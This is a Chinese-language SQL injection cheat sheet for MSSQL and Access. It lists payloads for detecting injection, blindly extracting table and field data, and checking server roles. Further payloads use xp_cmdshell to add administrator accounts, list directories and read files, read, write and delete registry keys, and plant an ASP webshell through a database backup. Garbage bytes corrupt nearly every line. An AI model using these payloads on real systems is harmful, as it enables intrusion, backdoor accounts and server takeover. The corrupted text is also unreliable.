1.判断是否有注入;and 1=1 ;and 1=2 �77M!2S�_E
2.初步判断是否是mssql ;and user>0 NMkP#s7�.y
L/u|9�0)�L
3.注入参数是字符'and [查询条件] and ''=' �Zv
%�>m�
~<_#%R���!
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ��t�oY_�1�
^�&�<M"�"Z
5.判断数据库系统 Dl/ C?Fll�
D/�E5��&6�
;and (select count(*) from sysobjects)>0 mssql
A�O�g�'4�
&| (K#|^@�
;and (select count(*) from msysobjects)>0 access QP'sS*saJ�
��?6_]^:s�
&oME�z 0��
i431�mpMa
6.猜数据库 ;and (select Count(*) from [数据库名])>0 z�bFy3-R�P
�E���3'I�;
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 P�n�9"��.
Vo"G@W)l�Z
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 v�`oilsrc�
b�D,21,*�z
9.(1)猜字段的ascii值(access) v\w*VCjoV�
xdO3k�oE:�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 7�g*!6�-W[
�z-�
q.8~Z
(2)猜字段的ascii值(mssql) |cC3L0�9��
o�+|>D&CW%
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 {qw'��gJmX
�/kGWd9ujF
10.测试权限结构(mssql) Y��W7w>}aW
%�f;v$r�sZ
R�J?�)�O#}
~m f�G
Yk"
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Q�9cSrU�[$
,[��
2N3iH
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �7FH�-l(�W
M
%,\�2!$�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 5 SQ!^1R 9
�0��gqV�>:
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �sO��) H#G
�|�}d�^lQ9
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- B*G]�Dr)�e
��2���(��d
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- UwW@}cy,L�
��8~T}�BC�
;and 1=(select IS_MEMBER('db_owner'));-- fExFp�R,`
q#�j[0,^ $
?sHZeW�Z(�
g}�`g>&l�5
11.添加mssql和系统的帐户 �"vk]���y�
%s�c��w]oF
;exec master.dbo.sp_addlogin username;-- B6���F�!"�
;exec master.dbo.sp_password null,username,password;-- �jIa�aNO)
/cClV"�S*G
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- T4W20�dxL7
6OE
x�An8
;exec master.dbo.xp_cmdshell 'net user username password CY?J�$s�N�
EC�\@$F�g�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �$x���}R2�
{ 5��r]G�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- /'8%=$2�Kw
i�?�B<&'�G
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- T
?�Om]:�j
7s%D(;W_Mo
�3�z0�B�g�
X#T|.mC�dC
12.(1)遍历目录 6c+�29@���
�~��0CN�CP
;create table dirs(paths varchar(100), id int) Y1lUO[F j�
\X
%#-��y
;insert dirs exec master.dbo.xp_dirtree 'c:\' �Sc��k!w 3
?n��<F?��~
;and (select top 1 paths from dirs)>0 "6]o�i*_8
G739�Ne[gL
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �UZ/�LR���
D�*@'%<?�
y
a�$yRsd`
yP�fx!9��B
(2)遍历目录 �yu�C"V'��
`/��1rZ�#�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �Q:)����4
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 nGGw(�6c%>
m��qe�W,89
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �();�Z,A
ec�m+33C��
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构
C2LG@iCIE
iO�m�&(�2/
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �3T(f�t^~�
!_Y�%+Rkp0
�&=t~_� Dc
MZV�bOcSAd
13.mssql中的存储过程 bBIN�js8C_
~~C�d�9Hzi
xp_regenumvalues 注册表根键, 子键 +Q��"s!�\5
�&K�!�0yR�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 _�&�(Wz�0�
�4grV2xtX�
xp_regread 根键,子键,键值名 3��K�(�/�=
v$`��3}<3-
;exec xp_regread [W�$x5|Z}Q
E_&��;.�hw
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ?p�6@uM\Q7
8Ud.t���=2
xp_regwrite 根键,子键, 值名, 值类型, 值 3q'nO��-KJ
N]8��/�l:@
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ,��P�pVZq~
�Y<��^�Or
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �U�p-�^km�
?/}IDwu��h
xp_regdeletevalue 根键,子键,值名 �{<IHiB35q
K4�Ed�]�hX
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 )��cgNf]oy
�gRs�@T<k2
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 %�>nAPO+e
z�Kk=R6�w
6k�')�12~'
��hJFxT8B/
14.mssql的backup创建webshell "pX�|?a��p
Lniz�>gSc
use model �;U0w<>4L
0XE6��H��w
create table cmd(str image); JWu0��VLo�
0(5qV�J1�2
insert into cmd(str) values (''); �3#f�g�
2
b7'�A5�]X
backup database model to disk='c:\l.asp'; cooi�cK�S7
*W=1�yPP�
=s�AOWI,8!
E�08!����a
15.mssql内置函数 r
'ioH�"=�
1=_?Wg:���
;and (select @@version)>0 获得Windows的版本号 ��4���J9Y�
�9R���+ qw
;and user_name()='dbo' 判断当前系统的连接用户是不是sa Yh,�,�(V�6
).�Z
U0f�V
;and (select user_name())>0 爆当前系统的连接用户 f U<<GK70
`�)=sQ�2P
;and (select db_name())>0 得到当前连接的数据库 fuf'�r>1n�
�Cs]\3R|D`
J{��;\TNkJ
"2!5g�)iO�
16.简洁的webshell q.hpnE~#lh
W)2��k>�cS
use model �KVC1�8"|f
4\U"��e��*
create table cmd(str image); 9n�d,8N�ji
N+�UBXhh��
insert into cmd(str) values (''); ��oj6=.� �
�)CH\]>-FO
backup database model to disk='g:\wwwtest\l.asp';
